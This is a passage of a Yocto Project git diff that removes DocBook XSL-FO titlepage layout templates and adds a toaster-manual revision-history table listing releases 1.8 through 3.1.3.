-    <legalnotice text-align="start"
-                 margin-left="0.5in"
-                 margin-right="0.5in"
-                 font-family="{$body.fontset}"/>
-    <pubdate space-before="0.5em"/>
-	<para></para>
-    <revision space-before="0.5em"/>
-    <revhistory space-before="0.5em"/>
-    <abstract space-before="0.5em"
-	      text-align="start"
-	      margin-left="0.5in"
-              margin-right="0.5in"
-              font-family="{$body.fontset}"/>
-
-    <para></para>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="set" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-      <title
-	     t:named-template="division.title"
-	     param:node="ancestor-or-self::set[1]"
-	     text-align="center"
-	     font-size="&hsize5;"
-	     space-before="&hsize5space;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"
-	      text-align="center"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="book" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-
-      <mediaobject/>	     
-
-      <subtitle
-		text-align="center"
-		font-size="&hsize4;"
-		space-before="&hsize4space;"
-		font-family="{$title.fontset}"/>
-      <corpauthor font-size="&hsize3;"
-		  keep-with-next="always"
-		  space-before="2in"/>
-      <authorgroup space-before="2in"/>
-      <author font-size="&hsize3;"
-	      space-before="&hsize2space;"
-	      keep-with-next="always"/>
-    </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-      <corpauthor/>
-      <authorgroup t:named-template="verso.authorgroup"/>
-      <author/>
-      <othercredit/>
-      <pubdate space-before="1em"/>
-      <copyright/>
-      <abstract/>
-      <legalnotice font-size="8pt"/>
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-      <fo:block break-after="page"/>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-      <fo:block break-after="page"/>
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="part" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-      <title
-	     t:named-template="division.title"
-	     param:node="ancestor-or-self::part[1]"
-	     text-align="center"
-	     font-size="&hsize5;"
-	     space-before="&hsize5space;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    <subtitle
-	      text-align="center"
-	      font-size="&hsize4;"
-	      space-before="&hsize4space;"
-	      font-weight='bold'
-	      font-style='italic'
-	      font-family="{$title.fontset}"/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="partintro" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   text-align="center"
-	   font-size="&hsize5;"
-	   font-weight="bold"
-	   space-before="1em"
-	   font-family="{$title.fontset}"/>
-    <subtitle
-	      text-align="center"
-	      font-size="&hsize2;"
-	      font-weight="bold"
-	      font-style="italic"
-	      font-family="{$title.fontset}"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="reference" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-      <title
-	     t:named-template="division.title"
-	     param:node="ancestor-or-self::reference[1]"
-	     text-align="center"
-	     font-size="&hsize5;"
-	     space-before="&hsize5space;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"
-	      text-align="center"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsynopsisdiv" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   font-family="{$title.fontset}"/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsection" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   font-family="{$title.fontset}"/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsect1" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   font-family="{$title.fontset}"/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsect2" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   font-family="{$title.fontset}"/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsect3" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   font-family="{$title.fontset}"/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="dedication" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="component.title"
-	     param:node="ancestor-or-self::dedication[1]"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize5;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="preface" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="component.title"
-	     param:node="ancestor-or-self::preface[1]"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize5;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-      <corpauthor/>
-      <authorgroup/>
-      <author/>
-      <othercredit/>
-      <releaseinfo/>
-      <copyright/>
-      <legalnotice/>
-      <pubdate/>
-      <revision/>
-      <revhistory/>
-      <abstract/>
-    </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="chapter" t:wrapper="fo:block"
-               font-family="{$title.fontset}">
-    <t:titlepage-content t:side="recto" margin-left="{$title.margin.left}">
-      <title t:named-template="component.title"
-	     param:node="ancestor-or-self::chapter[1]"
-	     font-size="&hsize5;"
-	     font-weight="bold"/>
-
-      <subtitle space-before="0.5em"
-		font-style="italic"
-		font-size="&hsize2;"
-		font-weight="bold"/>
-
-      <corpauthor  space-before="0.5em"
-	           space-after="0.5em"
-                   font-size="&hsize2;"/>
-
-      <authorgroup space-before="0.5em"
-	           space-after="0.5em"
-                   font-size="&hsize2;"/>
-
-      <author      space-before="0.5em"
-	           space-after="0.5em"
-                   font-size="&hsize2;"/>
-
-      <othercredit/>
-      <releaseinfo/>
-      <copyright/>
-      <legalnotice/>
-      <pubdate/>
-      <revision/>
-      <revhistory/>
-      <abstract/>
-    </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="appendix" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:named-template="component.title"
-	     param:node="ancestor-or-self::appendix[1]"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize5;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-      <corpauthor/>
-      <authorgroup/>
-      <author/>
-      <othercredit/>
-      <releaseinfo/>
-      <copyright/>
-      <legalnotice/>
-      <pubdate/>
-      <revision/>
-      <revhistory/>
-      <abstract/>
-    </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="section" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   margin-left="{$title.margin.left}"
-	   font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect1" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   margin-left="{$title.margin.left}"
-	   font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect2" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   margin-left="{$title.margin.left}"
-	   font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect3" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   margin-left="{$title.margin.left}"
-	   font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect4" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   margin-left="{$title.margin.left}"
-	   font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect5" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   margin-left="{$title.margin.left}"
-	   font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="simplesect" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   margin-left="{$title.margin.left}"
-	   font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="bibliography" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="component.title"
-	     param:node="ancestor-or-self::bibliography[1]"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize5;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="bibliodiv" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title t:named-template="component.title"
-	     param:node="ancestor-or-self::bibliodiv[1]"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize4;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="glossary" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="component.title"
-	     param:node="ancestor-or-self::glossary[1]"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize5;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="glossdiv" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title t:named-template="component.title"
-	     param:node="ancestor-or-self::glossdiv[1]"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize4;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="index" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="component.title"
-	     param:node="ancestor-or-self::index[1]"
-             param:pagewide="1"
-	     margin-left="0pt"
-	     font-size="&hsize5;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <!-- The indexdiv.title template is used so that manual and -->
-  <!-- automatically generated indexdiv titles get the same -->
-  <!-- formatting. -->
-
-  <t:titlepage t:element="indexdiv" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title t:force="1"
-	     t:named-template="indexdiv.title"
-	     param:title="title"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="setindex" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="component.title"
-	     param:node="ancestor-or-self::setindex[1]"
-             param:pagewide="1"
-	     margin-left="0pt"
-	     font-size="&hsize5;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="colophon" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="component.title"
-	     param:node="ancestor-or-self::colophon[1]"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize5;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="table.of.contents" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="gentext"
-	     param:key="'TableofContents'"
-             space-before.minimum="1em"
-             space-before.optimum="1.5em"
-             space-before.maximum="2em"
-	     space-after="0.5em"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize3;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-  <t:titlepage t:element="list.of.tables" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="gentext"
-	     param:key="'ListofTables'"
-             space-before.minimum="1em"
-             space-before.optimum="1.5em"
-             space-before.maximum="2em"
-	     space-after="0.5em"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize3;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-  <t:titlepage t:element="list.of.figures" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="gentext"
-	     param:key="'ListofFigures'"
-             space-before.minimum="1em"
-             space-before.optimum="1.5em"
-             space-before.maximum="2em"
-	     space-after="0.5em"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize3;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-  <t:titlepage t:element="list.of.examples" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="gentext"
-	     param:key="'ListofExamples'"
-             space-before.minimum="1em"
-             space-before.optimum="1.5em"
-             space-before.maximum="2em"
-	     space-after="0.5em"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize3;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-  <t:titlepage t:element="list.of.equations" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="gentext"
-	     param:key="'ListofEquations'"
-             space-before.minimum="1em"
-             space-before.optimum="1.5em"
-             space-before.maximum="2em"
-	     space-after="0.5em"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize3;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-  <t:titlepage t:element="list.of.procedures" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="gentext"
-	     param:key="'ListofProcedures'"
-             space-before.minimum="1em"
-             space-before.optimum="1.5em"
-             space-before.maximum="2em"
-	     space-after="0.5em"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize3;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-  <t:titlepage t:element="list.of.unknowns" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="gentext"
-	     param:key="'ListofUnknown'"
-             space-before.minimum="1em"
-             space-before.optimum="1.5em"
-             space-before.maximum="2em"
-	     space-after="0.5em"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize3;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-<!-- ==================================================================== -->
-
-</t:templates>
diff --git a/documentation/toaster-manual/history.rst b/documentation/toaster-manual/history.rst
new file mode 100644
index 0000000000..4312837e7f
--- /dev/null
+++ b/documentation/toaster-manual/history.rst
@@ -0,0 +1,58 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************
+Manual Revision History
+***********************
+
+.. list-table::
+   :widths: 10 15 40
+   :header-rows: 1
+
+   * - Revision
+     - Date
+     - Note
+   * - 1.8
+     - April 2015
+     - The initial document released with the Yocto Project 1.8 Release
+   * - 2.0
+     - October 2015
+     - Released with the Yocto Project 2.0 Release.
+   * - 2.1
+     - April 2016
+     - Released with the Yocto Project 2.1 Release.
+   * - 2.2
+     - October 2016
+     - Released with the Yocto Project 2.2 Release.
+   * - 2.3
+     - May 2017
+     - Released with the Yocto Project 2.3 Release.
+   * - 2.4
+     - October 2017
+     - Released with the Yocto Project 2.4 Release.
+   * - 2.5
+     - May 2018
+     - Released with the Yocto Project 2.5 Release.
+   * - 2.6
+     - November 2018
+     - Released with the Yocto Project 2.6 Release.
+   * - 2.7
+     - May 2019
+     - Released with the Yocto Project 2.7 Release.
+   * - 3.0
+     - October 2019
+     - Released with the Yocto Project 3.0 Release.
+   * - 3.1
+     - April 2020
+     - Released with the Yocto Project 3.1 Release.
+   * - 3.1.1
+     - June 2020
+     - Released with the Yocto Project 3.1.1 Release.
+   * - 3.1.2
+     - August 2020
+     - Released with the Yocto Project 3.1.2 Release.
+   * - 3.1.3
+     - September 2020
+     - Released with the Yocto Project 3.1.3 Release.
